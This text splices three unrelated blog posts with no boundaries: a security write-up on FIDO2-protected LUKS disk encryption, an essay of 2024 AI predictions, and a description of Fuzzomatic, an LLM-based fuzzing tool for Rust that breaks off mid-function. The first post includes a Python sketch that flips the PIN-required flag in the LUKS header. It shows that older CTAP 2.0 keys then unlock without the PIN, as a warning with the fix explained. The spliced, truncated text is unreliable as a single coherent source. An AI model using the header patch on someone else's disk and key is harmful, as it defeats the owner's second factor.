
FIDO2 security keys offer a versatile range of user authentication options. We have explored some of these possibilities during a workshop we presented at ph0wn. This post delves deeper into setting up disk encryption with LUKS safeguarded by a security key. We also explain the underlying mechanics and highlight pitfalls to avoid.
LUKS is a common solution for encrypting block devices such as solid-state drives on Linux. It works by placing an unencrypted header before the encrypted device, containing all the information needed to decrypt it. This header holds the parameters used to derive a key that decrypts a binary key slot area; the master key stored in a key slot is then used to encrypt and decrypt the whole device. The standard tool for managing encrypted devices is cryptsetup. For example, the luksFormat subcommand creates a LUKS device from a file or a block device. This command completely formats the device, so it has to be used carefully:
$ cryptsetup luksFormat disk.img
WARNING!
========
This will overwrite data on disk.img irrevocably.
Are you sure? (Type 'yes' in capital letters): YES
Enter passphrase for disk.img:
Verify passphrase:
cryptsetup requests a passphrase which will be used for device encryption and decryption. Our file disk.img is now formatted and encrypted. We can simply open it with the open subcommand:
$ sudo cryptsetup open disk.img encrypted
Enter passphrase for disk.img:
$ lsblk
...
loop23 7:23 0 30M 0 loop
└─encrypted 254:0 0 14M 0 crypt
...
Now, let's see how we can replace the passphrase with a security key.
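As an aside, the unencrypted header mentioned above is easy to observe directly: every LUKS device starts with a fixed magic value followed by a big-endian version field. A minimal sketch in Python (the helper name is ours, for illustration):

```python
import struct

# The LUKS header sits unencrypted at the start of the device: a 6-byte
# magic value followed by a big-endian 16-bit version field
# (1 for LUKS1, 2 for LUKS2).
LUKS_MAGIC = b"LUKS\xba\xbe"

def read_luks_version(path):
    with open(path, "rb") as f:
        magic, version = struct.unpack(">6sH", f.read(8))
    if magic != LUKS_MAGIC:
        raise ValueError("not a LUKS device")
    return version
```

Running it on an image formatted as above should return 2, since recent cryptsetup versions default to LUKS2.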
FIDO2 introduces a standardized communication protocol known as the Client to Authenticator Protocol (CTAP), which defines the exchange of information between security keys, also referred to as authenticators, and the operating system or web browser. The current version is 2.1, and a new version 2.2 has been published as a Review Draft. This standard is often used to authenticate users and get rid of passwords, as explained in one of our previous blog posts.
For LUKS disk encryption, a CTAP extension called "hmac-secret" is used. This extension extends the behavior of the authenticatorMakeCredential and authenticatorGetAssertion CTAP commands, making it possible to obtain a symmetric key for LUKS key slot decryption. You can check whether your authenticator supports the hmac-secret extension with the get_info.py example script of the Yubico python-fido2 library. This script uses the authenticatorGetInfo CTAP command to retrieve the authenticator information. For example, this is the output of the script when using the Ledger Nano X together with the Security Key application:
$ python get_info.py
CONNECT: CtapHidDevice('/dev/hidraw7')
Product name: Ledger Nano X
Serial number: 0001
CTAPHID protocol version: 2
DEVICE INFO: Info(versions=['U2F_V2', 'FIDO_2_0'], extensions=['hmac-secret', 'txAuthSimple'], aaguid=AAGUID(fcb2bcb5-f377-078c-6994-ec24d0fe3f1e), options={'rk': True, 'up': True, 'uv': True, 'clientPin': False}, max_msg_size=1024, pin_uv_protocols=[1], max_creds_in_list=None, max_cred_id_length=None, transports=[], algorithms=None, max_large_blob=None, force_pin_change=False, min_pin_length=4, firmware_version=None, max_cred_blob_length=None, max_rpids_for_min_pin=0, preferred_platform_uv_attempts=None, uv_modality=None, certifications=None, remaining_disc_creds=None, vendor_prototype_config_commands=None)
Device does not support WINK
This indicates that the device adheres to the CTAP 2.0 standard and supports the hmac-secret extension.
During the CTAP authenticatorMakeCredential command, if an hmac-secret parameter is present, the authenticator creates a credential ID and, in addition, generates 32 random bytes called CredRandom. To enroll a security key to a LUKS device, systemd offers a convenient tool called systemd-cryptenroll, which enrolls the authenticator using the hmac-secret extension. Again, the following command wipes the previous slots and thus has to be used with caution:
$ systemd-cryptenroll --fido2-device=auto --wipe-slot=all test.img
🔐 Please enter current passphrase for disk /home/luks/test.img: (press TAB for no echo)********
Initializing FIDO2 credential on security token.
👆 (Hint: This might require confirmation of user presence on security token.)
🔐 Please enter security token PIN: ********
Generating secret key on FIDO2 security token.
👆 In order to allow secret key generation, please confirm presence on security token.
New FIDO2 token enrolled as key slot 1.
Wiped slot 0.
Let's look at the new LUKS header of our device after the security key enrollment:
$ cryptsetup luksDump test.img
LUKS header information
Version: 2
Epoch: 6
Metadata area: 16384 [bytes]
Keyslots area: 16744448 [bytes]
UUID: df8d4f98-2e1e-4342-befb-edf4bfa3e5a8
Label: (no label)
Subsystem: (no subsystem)
Flags: (no flags)
Data segments:
0: crypt
offset: 16777216 [bytes]
length: (whole device)
cipher: aes-xts-plain64
sector: 4096 [bytes]
Keyslots:
1: luks2
Key: 512 bits
Priority: normal
Cipher: aes-xts-plain64
Cipher key: 512 bits
PBKDF: pbkdf2
Hash: sha512
Iterations: 1000
Salt: 2e 93 59 1b 94 e1 df 30 2a 98 15 10 f1 5c b5 19
89 65 d4 fd 2f 58 ac 02 68 8b cc 42 07 0b 99 12
AF stripes: 4000
AF hash: sha512
Area offset:290816 [bytes]
Area length:258048 [bytes]
Digest ID: 0
Tokens:
0: systemd-fido2
fido2-credential:
db 76 b3 fc 9d d0 18 e5 1e ec f0 53 2b ed e9 8b
b7 70 73 85 fd 4f 16 d5 7c dc 21 1c 2c 8f 12 e7
29 f7 a1 22 05 5b e0 43 e4 45 23 55 33 88 6d 34
89 03 9b 2c 77 92 1a 87 6e e5 24 23 2f 40 05 e6
fido2-salt: 95 11 36 b7 b1 93 54 42 0f 4f 79 95 4e e4 77 d1
f9 e0 d7 7a f1 37 fd 49 ab 04 6c f0 cd d9 7b 8a
fido2-rp: io.systemd.cryptsetup
fido2-clientPin-required:
true
fido2-up-required:
true
fido2-uv-required:
false
Keyslot: 1
Digests:
0: pbkdf2
Hash: sha256
Iterations: 326455
Salt: ac 17 58 50 09 95 09 c8 bc e5 fd d3 03 50 8f 98
c9 76 55 2b e7 fc 45 09 d4 c8 4b ce b2 12 30 79
Digest: ab 67 ee 89 09 45 4f ba 80 35 1a f0 a1 0b e0 ae
8b e9 82 8f 72 7b 6a 54 b5 6a 43 91 aa 0a 6c fe
We can see that token 0 is associated with key slot 1. This token has a fido2-credential, the credential ID, which allows the security key to reconstruct everything it needs, including the value of CredRandom. Nothing is stored on the security key itself, so the credential ID has to be stored in the LUKS header.
Then, to generate a secret, the CTAP authenticatorGetAssertion command is used. A shared secret between the security key and the host is obtained by computing a Diffie-Hellman key agreement between the host and the security key. The shared secret is used as a key to encrypt and authenticate a salt chosen by the host and embedded within the fido2-salt field of the LUKS header. The encrypted salt is sent to the security key, which verifies its authenticity and decrypts it. Then the authenticator generates a secret output, the HMAC of the previously generated CredRandom and the salt:
output = HMAC-SHA-256(CredRandom, salt)
It is returned encrypted to the host. Once decrypted, cryptsetup uses this secret to decrypt the associated key slot. In practice, when you want to decrypt the LUKS image, cryptsetup needs your authenticator and your PIN code to reconstruct the secret output:
$ sudo cryptsetup open --token-only image.img encrypted
Enter token PIN:
Asking FIDO2 token for authentication.
👆 Please confirm presence on security token to unlock.
Since part of the secret, CredRandom, is only recoverable by the security key, it is not possible to decrypt the device without it.
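The final HMAC step is simple enough to model in a few lines of Python. The values below are randomly generated stand-ins: the real CredRandom never leaves the authenticator, and the real salt comes from the fido2-salt field shown in the header dump above.

```python
import hmac
import hashlib
import os

def hmac_secret(cred_random: bytes, salt: bytes) -> bytes:
    # output = HMAC-SHA-256(CredRandom, salt)
    return hmac.new(cred_random, salt, hashlib.sha256).digest()

# Stand-in values for illustration only.
cred_random = os.urandom(32)  # generated during authenticatorMakeCredential
salt = os.urandom(32)         # chosen by the host at enrollment time

secret = hmac_secret(cred_random, salt)
assert len(secret) == 32  # the 32-byte secret used to unlock the key slot
```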
CTAP employs a parameter called clientPin during credential creation. When set to true, it indicates that a PIN code has been configured on your authenticator, and you will be prompted for this PIN for future credential generation. If you have not set a PIN code and enroll your security key without clientPin set to true, the PIN code will never be required for device decryption, even if you configure one later. This arrangement is suitable for devices like the Ledger wallet, which requires a separate PIN code just to start the device. For other authenticators, however, this poses a potential issue: anyone who steals both the disk and the authenticator could decrypt your data without knowing your PIN code.
There is another issue as well. If clientPin was set but an authenticatorGetAssertion request is made without the PIN code, CTAP 2.0 specifies:

This implies that if the pinAuth parameter is omitted, the 'uv' bit is set to 0, meaning that user verification was not performed by the authenticator. However, the CTAP specification does not explicitly state whether the hmac-secret extension should return the secret based on the 'uv' bit. To investigate this behavior, we conducted experiments on various authenticators. We started with a Solo key running an outdated firmware version (3.0.0):
$ python get_info.py
CONNECT: CtapHidDevice('/dev/hidraw6')
Product name: SoloKeys Solo 3.0.0
Serial number: 2060469E55B9
CTAPHID protocol version: 2
DEVICE INFO: Info(versions=['U2F_V2', 'FIDO_2_0'], extensions=['hmac-secret'], aaguid=AAGUID(8876631b-e4a0-428f-5784-0ac71c9e0279), options={'rk': True, 'up': True, 'plat': False, 'clientPin': True}, max_msg_size=1200, pin_uv_protocols=[1], max_creds_in_list=None, max_cred_id_length=None, transports=[], algorithms=None, max_large_blob=None, force_pin_change=False, min_pin_length=4, firmware_version=None, max_cred_blob_length=None, max_rpids_for_min_pin=0, preferred_platform_uv_attempts=None, uv_modality=None, certifications=None, remaining_disc_creds=None, vendor_prototype_config_commands=None)
WINK sent!
This authenticator supports CTAP 2.0 with the hmac-secret extension, and its client PIN is already set. We then enrolled our key to a LUKS device as previously and obtained the same header as before. Next, we patched the fido2-clientPin-required value in the LUKS header to false. Since the header has a checksum mechanism, we created a script to handle the whole operation, available here. After patching the header, we can verify that everything is fine:
$ cryptsetup luksDump test.img
LUKS header information
Version: 2
Epoch: 6
Metadata area: 16384 [bytes]
Keyslots area: 16744448 [bytes]
UUID: 7a8cc432-f3ef-48de-9644-74e7d6c81d6a
Label: (no label)
Subsystem: (no subsystem)
Flags: (no flags)
Data segments:
0: crypt
offset: 16777216 [bytes]
length: (whole device)
cipher: aes-xts-plain64
sector: 4096 [bytes]
Keyslots:
1: luks2
Key: 512 bits
Priority: normal
Cipher: aes-xts-plain64
Cipher key: 512 bits
PBKDF: pbkdf2
Hash: sha512
Iterations: 1000
Salt: b7 ed 7b 10 20 c4 d6 65 cc 59 5c 64 16 9c 1e b4
22 33 63 09 a1 1f fc f4 5b 77 79 02 81 47 7d 35
AF stripes: 4000
AF hash: sha512
Area offset:290816 [bytes]
Area length:258048 [bytes]
Digest ID: 0
Tokens:
0: systemd-fido2
fido2-credential:
1e 51 5b 40 ac cb 0f d0 da e3 eb 5f 20 f9 1c aa
c3 16 f6 3c a4 00 ad ca 21 ab 64 ef e5 a3 03 ac
4b 42 3b a2 a1 21 ff 04 55 14 ab e1 b8 2a 95 99
df d9 be 3c 43 64 db 0d 6c d0 10 00 d7 29 10 1a
ba 8f 87 02 00 00
fido2-salt: bc 34 af d7 bd 50 0b 9a 8a 7f 63 51 a6 fb d3 77
36 34 ce 2a c0 26 e7 bf 49 b3 1b 31 d3 3b 11 46
fido2-rp: io.systemd.cryptsetup
fido2-clientPin-required:
false
fido2-up-required:
true
fido2-uv-required:
false
Keyslot: 1
The field fido2-clientPin-required is now set to false. And if we try to open our device:
$ sudo cryptsetup open --token-only test.img encrypted
Asking FIDO2 token for authentication.
👆 Please confirm presence on security token to unlock.
Surprise! In this case, no PIN code is requested, but the device is decrypted correctly. As explained before, this is a security issue if someone is able to steal both your disk and your security key. This behavior is not shared by all authenticators, however. We tested a YubiKey with firmware version 5.1.1, and it turned out that the key would not return the secret even when fido2-clientPin-required is set to false.
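For reference, patching the token does not strictly require reimplementing the checksum logic: recent cryptsetup versions can export, remove and re-import token JSON and recompute the header checksum themselves. A sketch of that route (the image path and token ID are assumptions, and the exact JSON encoding of the fields may differ between systemd versions):

```python
import json
import subprocess

def disable_pin_requirement(token: dict) -> dict:
    # Flip the flag that tells cryptsetup a PIN is needed (field name
    # taken from the luksDump output above).
    patched = dict(token)
    patched["fido2-clientPin-required"] = False
    return patched

def patch_image(image: str, token_id: str = "0") -> None:
    # cryptsetup recomputes the LUKS2 header checksum on import, so no
    # manual checksum handling is needed with this route.
    raw = subprocess.check_output(
        ["cryptsetup", "token", "export", "--token-id", token_id, image])
    patched = disable_pin_requirement(json.loads(raw))
    subprocess.run(["cryptsetup", "token", "remove",
                    "--token-id", token_id, image], check=True)
    subprocess.run(["cryptsetup", "token", "import",
                    "--token-id", token_id, image],
                   input=json.dumps(patched).encode(), check=True)
```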
This flaw was rectified in later CTAP versions, starting with CTAP 2.1. The security key now generates two distinct secrets during the authenticatorMakeCredential command: CredRandomWithUV and CredRandomWithoutUV. During the authenticatorGetAssertion command, the authenticator decides whether to use CredRandomWithUV or CredRandomWithoutUV as the CredRandom for secret generation, depending on whether user verification was performed in the preceding steps. Let's observe how a newer security key behaves in practice. We've selected a newer YubiKey 5 NFC as our example.
$ python get_info.py
CONNECT: CtapHidDevice('/dev/hidraw5')
Product name: Yubico YubiKey OTP+FIDO+CCID
Serial number: None
CTAPHID protocol version: 2
DEVICE INFO: Info(versions=['U2F_V2', 'FIDO_2_0', 'FIDO_2_1_PRE'], extensions=['credProtect', 'hmac-secret'], aaguid=AAGUID(2fc0578f-8553-48ea-b11f-ba5a8fb9213a), options={'rk': True, 'up': True, 'plat': False, 'clientPin': True, 'credentialMgmtPreview': True}, max_msg_size=1200, pin_uv_protocols=[2, 1], max_creds_in_list=8, max_cred_id_length=128, transports=['nfc', 'usb'], algorithms=[{'alg': -7, 'type': 'public-key'}, {'alg': -8, 'type': 'public-key'}], max_large_blob=None, force_pin_change=False, min_pin_length=4, firmware_version=328707, max_cred_blob_length=None, max_rpids_for_min_pin=0, preferred_platform_uv_attempts=None, uv_modality=None, certifications=None, remaining_disc_creds=None, vendor_prototype_config_commands=None)
WINK sent!
The FIDO_2_1_PRE entry indicates that the authenticator partially supports the CTAP 2.1 protocol. Then, as previously, we enrolled our key to the disk image, patched the LUKS header with our script and, finally, tried to open the image with cryptsetup:
$ sudo cryptsetup open --token-only test.img encrypted
Asking FIDO2 token for authentication.
👆 Please confirm presence on security token to unlock.
It seems we have the same problem as before. However, the device is not open properly and if we ask cryptsetup to be more verbose we can understand the problem:
$ sudo cryptsetup open --token-only test.img encrypted --debug
Asking FIDO2 token for authentication.
👆 Please confirm presence on security token to unlock.
# Trying to open keyslot 1 with token 0 (type systemd-fido2).
# Trying to open LUKS2 keyslot 1.
# Running keyslot key derivation.
# Reading keyslot area [0x47000].
# Acquiring read lock for device test.img.
# Verifying lock handle for test.img.
# Device test.img READ lock taken.
# Reusing open ro fd on device test.img
# Device test.img READ lock released.
# Verifying key from keyslot 1, digest 0.
# Digest 0 (pbkdf2) verify failed with -1.
# Releasing crypt device test.img context.
# Releasing device-mapper backend.
# Closing read only fd for test.img.
Command failed with code -2 (no permission or bad passphrase).
# Unloading systemd-fido2 token handler.
The key slot verification failed. That is consistent with the use of CredRandomWithoutUV, which differs from CredRandomWithUV in CTAP 2.1 and thus leads to a different generated secret.
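The CTAP 2.1 behavior can be modeled with a toy authenticator (this is an illustration of the mechanism, not real authenticator code):

```python
import hmac
import hashlib
import os

class Ctap21HmacSecret:
    """Toy model of the CTAP 2.1 fix: two independent secrets are
    created at makeCredential time, and the one used for the HMAC
    depends on whether user verification was actually performed."""

    def __init__(self):
        self.cred_random_with_uv = os.urandom(32)
        self.cred_random_without_uv = os.urandom(32)

    def get_secret(self, salt: bytes, uv_performed: bool) -> bytes:
        key = (self.cred_random_with_uv if uv_performed
               else self.cred_random_without_uv)
        return hmac.new(key, salt, hashlib.sha256).digest()

# An assertion made without the PIN now yields a different secret, so a
# patched header can no longer unlock the key slot.
auth = Ctap21HmacSecret()
salt = os.urandom(32)
assert auth.get_secret(salt, True) != auth.get_secret(salt, False)
```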
This update is now implemented in the latest Solo key firmware, but some authenticators may not be upgradable, so it is better to check which CTAP version your authenticator supports before setting up disk encryption.
FIDO2 security keys offer a convenient and secure method for unlocking LUKS encrypted disks. However, it’s crucial to understand the underlying mechanisms and potential pitfalls to ensure optimal protection. To safeguard your data, it’s essential to utilize FIDO2 security keys with the latest CTAP version and ensure proper credential creation procedures, including user verification when applicable.
If you know me, you'll know I'm not a fan of making tech predictions. It's just not possible to account for the complexities of the world and the bucket of other unknowns, and we tend to be far too confident in our predictions. Humans, right? However, looking at some current trends leads to some pretty probable predictions. Besides, our marketing department loves predictions, so here is a Hunter S. Thompson-style set of predictions, written under duress.

I want to take a different approach with these predictions than the typical hype-laden AI predictions (guesses) you typically see. I’ve added some context and food for thought with each prediction. I hope this is more enlightening than dropping a few bullet points.
Here is what I believe is in store for 2024.
If you thought ChatGPT was causing your organization problems, it will get worse. In June, I started touching on this topic with my More than ChatGPT: Privacy and Confidentiality in the Age of LLMs post. It’s relatively easy for anyone to copy and paste some Python code and send data to an API. This post was before the announcement of GPTs, Microsoft’s Copilot Studio, and maybe whatever Amazon’s Q is supposed to be. These provide a better interface with more bubble wrapping. There’s no doubt more of these tools are on the horizon from other providers, and the complete reduction of friction is the goal.
The value proposition of these tools is allowing non-developers to use natural language to program new applications and deploy them for themselves or others. I like the spirit of empowering everyone at the company to create tools and solve problems, but there’s a reason we don’t let everyone at the company build and ship code. Non-developers aren’t accustomed to building and deploying software, much less knowing about issues with data and evaluating the output of software built. Even if these applications aren’t deployed outside of an organization (many may not be), they could expose data to compromise, lead to bad business decisions, and possibly put the organization in violation of regulatory compliance. The fact that they may be insecure is almost beside the point; the real problem is that security teams and the organization as a whole won’t know about them in the first place.
Many organizations continue to struggle with their more traditional development security challenges; now, many will have to worry about a new landscape of applications distributed across an organization. Most organization’s processes and approaches are entirely inadequate for what’s on the horizon. Much of this functionality is billed more as Excel on steroids vs. a development team pushing new software, but it’s still early. The time to prepare is now.
We’ve reached a point where just asking questions turns into code execution. Exciting.
The most significant hurdle to Generative AI adoption is the lack of appropriate business use cases. This is according to a November 2023 O’Reilly Radar Report titled Generative AI in the Enterprise. In addition, once you’ve identified a use case, operationalizing and getting it into production is another challenge. Use cases rarely operationalize as easily as the tutorials make it seem, and unexpected pitfalls tank the project.
Solutions often work in small tests, and the real problems don’t present themselves until they get launched into production and are confronted with the complexities of the real world. Before the generative AI craze, it was known that most AI experiments don’t make it into production, but for some reason, people treat generative AI as the exception.
The biggest companies in the world are struggling to operationalize these technologies in their environments, so we should expect this trend to continue to be a challenge into 2024.
Imagine a world where you never know why any files are being accessed, you never know why your data is being sent anywhere, and you never know why code is changing and executing. You haven’t entered the Security Twilight Zone. You’ve entered our very near future. There’s a relentless push by vendors to “AI” everything and drive integration deeper into systems. What we tend to forget is that these technologies are experimental. We haven’t even found all of the issues with them yet and don’t have fixes for all the issues we’ve found, but every day, production pushes them deeper into systems.
Zooming out, the attack surface changes as systems that can be manipulated are integrated into previously robust applications, allowing attackers to exert far greater control over these applications and manipulate them in unexpected ways.
Beyond security, there is a very real danger to privacy. Deep learning approaches are data-hungry, and there’s a temptation to use what you have access to. LLMs are typically worse for privacy because, most often, you need to be able to see the plaintext request and response to evaluate the quality of the generation. This evaluation, in many cases, is done by a human. Even when privacy protections exist in one product, it may not be the case in other product offerings from the company. So, it’s essential to keep an eye on the scope of these in your usage agreements and terms of service.
Impacts on security and privacy remain situational and depend on the use case. But the deeper the integration into products, the more elevated the impact, by the very nature of the depth of the integration. A whole lot of compromises will happen, data will be lost, and many will claim they never saw it coming. 🤷‍♂️
This prediction may be stretching it for 2024. We are still deep in the hype.
When GPT-5 lands, it won’t be much better than GPT-4 and far from majorly better. With all of the hype and speculation around GPT-5 having near-AGI capabilities, the reality will surely be a letdown to the AI hype machine. We’ve reached a limit with the current LLM approaches, and bigger only buys you so much. So, without some new innovation, we are stuck relatively where we are. It’s possible that tweaks and additional modalities may make GPT-5 more useful for certain tasks, but not in a generalizable way.
I saw this image being passed around if you are looking for a visual aid.

You can get a glimpse of this by looking at the current landscape of the various LLMs that have been released. It seems everyone is releasing an LLM, and none of them are substantially better than any other one. Sure, some may perform better at certain tasks, have additional modalities, or have been trained and fine-tuned differently, but they are all relatively the same.
The dirty little secret of Generative AI is the environmental costs, and it’s getting almost no attention. People railed against the negative environmental impacts of Proof of Work cryptocurrencies (and still are), but the same people are now silent on the environmental impacts of AI. Some of this is partly due to the fact that using these tools abstracts the user from the real costs of their transactions.
The following is from an AP news article covering the topic.
Ren’s team estimates ChatGPT gulps up 500 milliliters of water (close to what’s in a 16-ounce water bottle) every time you ask it a series of between 5 to 50 prompts or questions. The range varies depending on where its servers are located and the season. The estimate includes indirect water usage that the companies don’t measure — such as to cool power plants that supply the data centers with electricity.
This usage can also be particularly impactful when it happens during a drought.
Another new paper, Power Hungry Processing ⚡️Watts ⚡️ Driving the Cost of AI Deployment, also dives into this issue. This paper confirms a couple of assumptions that you may already have.
It’s certainly something to consider before participating in the next AI-generated viral meme trend.
There are other sustainability factors at play as well. As long as there is little transparency and organizations rely on subsidies from big tech companies, the true cost of running these models isn't known. It's important for the sustainability of a service to know whether you are paying $10 a month for something that costs the company $30 a month to offer you. This is something Clem Delangue, CEO of Hugging Face, calls "cloud money laundering." It matters for organizations looking to deploy generative AI solutions because the cost to deploy and maintain a service could skyrocket, making it less attractive or infeasible.
In 2024, this topic will start to be part of the public conversation, potentially creating a more precise understanding and additional research about the actual cost of the technology. I don’t expect any significant changes to happen in 2024, but having a better understanding can lead to proposed plans to help offset the impact.
If there is one prediction that I can make with 100% confidence, it’s that the goalposts will move. First was the access to the API; then, it was GPT-4; then, it was multi-modality; and now, it’s GPT-5, which will completely transform the world and be more impactful than the printing press.
It’s useful to remember that technology doesn’t have to be earth-shattering to be useful. We don’t need AGI to solve problems. I mentioned recently that I find my car’s driver assistance and safety features incredibly helpful, despite not having a self-driving car. I think we should be looking at AI technology the same way.
Many people and organizations are doing cool things with the technology today. It doesn’t have to be the new printing press to make an impact. So, stop hyping and start using.
Due to the factors outlined in this post and a variety of other factors, in 2024, we should see the hype around generative AI start to cool as certain realities set in and investors start asking tougher questions. This doesn’t mean AI is dead, far from it. Technologies under the AI umbrella are already part of our daily lives, and there will be continued advancements leading to solved problems.
Ultimately, we should prepare to be surprised. So many people are working in the area there are bound to be surprises. It’s time to start thinking critically about how we look at and deploy AI technology in our environments to ensure the right steps are taken to protect our assets. So, here’s to 2024.
In August 2023, Google published research they did on AI-powered fuzzing. They showed they could automatically improve fuzzing code coverage of C/C++ projects already enrolled in OSS-Fuzz thanks to AI. They found that for 14/31 (or 45%) of the projects on which this research was conducted, generated fuzz targets successfully built.
This research inspired us, and we thought we could expand on this work and bring something new to the table. Previous research started with projects that already did fuzzing. Indeed, all projects enrolled in OSS-Fuzz have at least one existing working fuzz target, and this is what was used in the above research to build prompts. We wanted to go a step further and be able to start fuzzing projects completely from scratch when no working fuzz target examples for the project under test already exist.
To maximize success, we decided to focus on projects written in Rust. Not just because we love Rust, but because of the highly consistent project structure usually observed in that language: most projects use Cargo as their build system, which minimizes fragmentation in the Rust ecosystem. Many assumptions can be made about a Rust code base because it's easy to know how to build it, where to find its unit tests and examples, and what its dependencies are.
With that in mind, it was time to build something capable of automatically fuzzing Rust projects from scratch, even projects that didn't do any fuzzing at all.
We built Fuzzomatic, an automated fuzz target generator and bug finder for Rust projects, written in Python. Fuzzomatic is capable of generating fuzz targets that successfully build for a Rust project, completely from scratch. Sometimes the target will build but it won’t do anything useful. We detect these cases by evaluating whether the code coverage increases significantly when running the fuzzer. In successful cases, the target is going to do something useful, such as calling a function of the project under test with random input. It will also sometimes automatically find panics in the code base under test. The tool reports whether the generated target successfully builds and whether a bug was found.
Fuzzomatic relies on libFuzzer and cargo-fuzz as a backend. It also uses a variety of approaches that combine AI and deterministic techniques to achieve its goal.
We used the OpenAI API to generate and fix fuzz targets in our approaches. We mostly used the gpt-3.5-turbo and gpt-3.5-turbo-16k models. The latter is used as a fallback when our prompts are longer than what the former supports.
The output of the first step is a source code file: a fuzz target. A libFuzzer fuzz target in Rust looks like this:
#![no_main]
extern crate libfuzzer_sys;
use mylib_under_test::MyModule;
use libfuzzer_sys::fuzz_target;
fuzz_target!(|data: &[u8]| {
// fuzzed code goes here
if let Ok(input) = std::str::from_utf8(data) {
MyModule::target_function(input);
}
});
This fuzz target needs to be compiled into an executable. As you can see, the program depends on libFuzzer as well as on the library under test, here "mylib_under_test". The "fuzz_target!" macro lets us simply write what needs to be called, given a byte slice: the "data" variable in the example above. Here, we convert these bytes to a UTF-8 string and pass it to our target function. LibFuzzer takes care of calling our fuzz target repeatedly with random bytes and measures the code coverage to assess whether the random input helps cover more code; this is called coverage-guided fuzzing.
Once we have generated a fuzz target, we try to compile it. If it compiles successfully, that’s great, and we run the compiled executable for a maximum of 10 seconds. We capture the standard output (stdout) of the fuzz target and evaluate whether code coverage changes significantly. If that’s the case, we can be quite confident that the fuzz target is doing something useful. We say that the target is “useful” in that case. Indeed, if we generate an empty fuzz target or one that calls a function with a constant or that doesn’t use the random input at all, the code coverage shouldn’t vary too much. This may not be 100% accurate, but we found that it’s a good enough metric.
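The usefulness check boils down to parsing the coverage counters libFuzzer prints on its status lines. A simplified sketch (the growth threshold is an arbitrary stand-in, not Fuzzomatic's actual value):

```python
import re

def is_useful(fuzzer_stdout: str, min_growth: int = 10) -> bool:
    # libFuzzer status lines look like "#512 NEW cov: 84 ft: 90 ...";
    # we compare the first and last reported edge-coverage counters.
    cov = [int(m) for m in re.findall(r"\bcov: (\d+)", fuzzer_stdout)]
    return len(cov) >= 2 and cov[-1] - cov[0] >= min_growth

sample = "#2 INITED cov: 15 ft: 16 corp: 1/1b\n#512 NEW cov: 84 ft: 90 corp: 5/24b"
assert is_useful(sample)
```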
We also detect when the fuzzer crashes. When that happens, we have a look at the stack trace in the standard output and see whether the crash happened in the fuzz target itself or in the code base under test. If it’s in the code base under test, then we likely found a bug.
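The triage step can be approximated by checking whether the generated fuzz target file appears in the panic's stack trace (the file name and the heuristic are simplified stand-ins for what the tool actually does):

```python
def likely_library_bug(stack_trace: str,
                       fuzz_target_file: str = "fuzz_targets/auto.rs") -> bool:
    # If the backtrace never mentions the generated fuzz target file,
    # the crash most likely originates in the code base under test.
    return fuzz_target_file not in stack_trace

assert likely_library_bug("thread panicked at src/parser.rs:42")
assert not likely_library_bug("thread panicked at fuzz_targets/auto.rs:7")
```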
If the fuzz target does not build, we feed the compilation errors and the fuzz target to the LLM and ask it to fix the code without modifying its behavior. Applying this technique multiple times usually results in a fuzz target that successfully builds. If not, we move on to the next approach.
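The fix loop itself is straightforward. Here is a sketch where compile_fn and fix_fn are hypothetical callables standing in for the real cargo build and the LLM call:

```python
def build_with_llm_fixes(target_src, compile_fn, fix_fn, max_attempts=5):
    # compile_fn(src) -> (ok, errors); fix_fn(src, errors) -> new src.
    # Both are placeholders for the real cargo-fuzz build and OpenAI calls.
    for _ in range(max_attempts):
        ok, errors = compile_fn(target_src)
        if ok:
            return target_src
        target_src = fix_fn(target_src, errors)
    return None  # give up and move on to the next approach
```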
To minimize LLM costs, we turn off compilation warnings and keep only the errors: warnings do not really help fix the errors and are quite verbose. In addition, the longer the compilation errors, the more tokens they turn into, and the more we have to pay, since OpenAI charges per token processed.
At first, the most common compilation errors were caused by incorrect or missing dependencies. The LLM may generate a code snippet that imports a module from the library under test, but the import statement may be incorrect, or some import statements may be missing entirely. To minimize dependency issues and reduce the number of LLM calls, we do two things:
Even with this, we still had compilation errors due to incorrect imports. We significantly reduced that error rate by adding a new approach: the "functions" approach. But first, let's see what those approaches are.
The approaches we attempt include:
The approaches are attempted one by one, until one works and gives us a useful fuzz target.
This approach is pretty simple. If there’s a README file in the code base, we read its contents and use it to build a prompt for the LLM. In that prompt, we ask the LLM to generate a fuzz target, given the README file.
This approach clearly doesn’t work if the README file only contains installation instructions, for example. If it contains example code snippets that show how to use the library under test, then it is likely to work.
We’ve seen projects where the README contains code snippets that contain errors. For example, one project had not updated the README file in a long time, and it went out of sync with the actual code base. Therefore, the code snippet in the README file would not build. In such cases, this approach may not work either.
The examples approach is similar to the README approach. The only difference is that we use the Rust files in the “examples” directory instead of the README file. The benchmark approach is essentially the same thing, except that it uses the Rust files in the “benches” directory.
We use semgrep to identify pieces of code that have a “#[test]” attribute and feed them to the LLM. We also try to capture the imports and potential helper functions that may be defined next to a unit test. We arbitrarily limit this approach to at most three unit tests, rather than all of them, to keep the execution time reasonable. The shortest unit tests are tried first to minimize AI costs.
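The selection policy itself is trivial; a sketch of it (snippet extraction via semgrep is not shown, and the limit is the arbitrary value mentioned above):

```python
# Hedged sketch of the unit-test selection policy: keep at most three
# #[test] snippets, shortest first, to cap fuzzer runtime and LLM
# token costs.
def pick_unit_tests(snippets: list[str], limit: int = 3) -> list[str]:
    """Return at most `limit` test snippets, shortest first."""
    return sorted(snippets, key=len)[:limit]

tests = ["#[test] fn long_one() { /* ... lots of setup code ... */ }",
         "#[test] fn tiny() {}",
         "#[test] fn medium() { assert!(true); }"]
print(pick_unit_tests(tests, limit=2))
```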
We first obtain a list of all the public functions in the code base under test. This is achieved by running “cargo rustdoc” and asking it to output to JSON format. This is an unstable feature and requires passing some arguments to “rustdoc” to make it work. However, this is a really powerful feature because it gives information straight from the compiler, which would have been much more difficult to accurately obtain with static analysis. We can then parse the generated JSON file and extract all the public functions and their arguments, including their type. In addition to that, we also get the path to the identified function. For example, if we have a library named “mylib” that contains a module named “mymod”, which contains a function “func”, its path would be “mylib::mymod::func”. Rustdoc uses the compiler’s internal representation of the program to obtain accurate information about where each function is located and this is always correct. With this information, we can kiss the import errors we previously had goodbye.
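Consuming that JSON takes only a few lines. Below is a hedged sketch in Python; note that rustdoc's JSON schema is unstable and version-dependent, so the field names ("paths", "kind", "path") reflect one snapshot of the format, and the exact invocation (something like `cargo +nightly rustdoc -- -Z unstable-options --output-format json`) may differ across toolchains.

```python
# Sketch: list public functions from rustdoc's (unstable) JSON output.
# Field names are assumptions based on one snapshot of the format.
import json

def public_functions(doc_json: str) -> list[str]:
    """Return fully qualified paths like 'mylib::mymod::func'."""
    doc = json.loads(doc_json)
    functions = []
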